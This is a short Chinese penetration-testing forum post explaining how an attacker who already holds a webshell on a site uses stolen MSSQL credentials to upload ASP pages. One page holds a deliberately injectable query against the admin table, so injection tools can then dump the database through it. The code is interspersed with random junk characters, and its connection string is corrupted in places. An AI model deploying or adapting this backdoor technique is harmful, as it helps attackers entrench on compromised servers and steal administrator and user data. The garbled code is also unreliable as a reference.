中国网络渗透测试联盟

标题: 伪造注入点方法 [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: 伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:0 R+ {7 ~& e  ^# ?
ASP/Visual Basic代码
# V* @% {& n3 |" r* R/ ]$ \<!--#include file="xx.asp"-->   
/ c- O5 V( h# k" v" b; U<%   
- n4 A: N5 F0 }" oset rs=server.createobject("ADODB.recordset")    / L, `( F# h' z  k+ W
id = request("id")   
3 x% f& u2 v. M/ |strSQL = "select * from admin where id=" & id    $ d5 h0 U' @: A; U  j" G8 d. b
rs.open strSQL,conn,1,3   
( @* A; [  H; k; p$ E4 Urs.close    9 W2 _, y/ z- F  Z. d3 V2 z
%>  
6 v2 N/ S' g4 b把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!* p2 H1 d, |1 |2 O
然后就要构造一个连接数据库的文件了,代码如下:
9 Q( C6 K$ t! x3 l; U0 j: `$ bASP/Visual Basic代码
8 u, u/ P/ d; k% ]1 A4 n/ |5 Z0 E- b& X<%            8 q) f; f; i5 J, z6 K
strSQLServerName = "000.000.000.000"     '服务器名称或地址   
3 \& B" ]1 z1 D* T( W/ N$ U- M8 }$ hstrSQLDBUserName = "sqlname"         '数据库帐号    9 E; e" {% S/ @, f0 R
strSQLDBPassword = "sqlpass"         '数据库密码    9 w" n8 Y6 P! \% C) X. Q' t3 y
strSQLDBName = "sqldataname"           '数据库名称    6 Q* `7 Y. k1 q4 B6 w) g% F% ]0 P
Set conn = Server.CreateObject("ADODB.Connection")   
' p- \6 s% ]- [4 C. c+ P" zstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"   
" g% y; K9 N7 `" Jconn.open strCon   
8 e$ M( {! }# a+ \- y# c  d: w%>  8 I4 v# e: z* H5 |. j8 p8 u3 K
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功; O0 {  C% U3 R+ P$ f; x





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2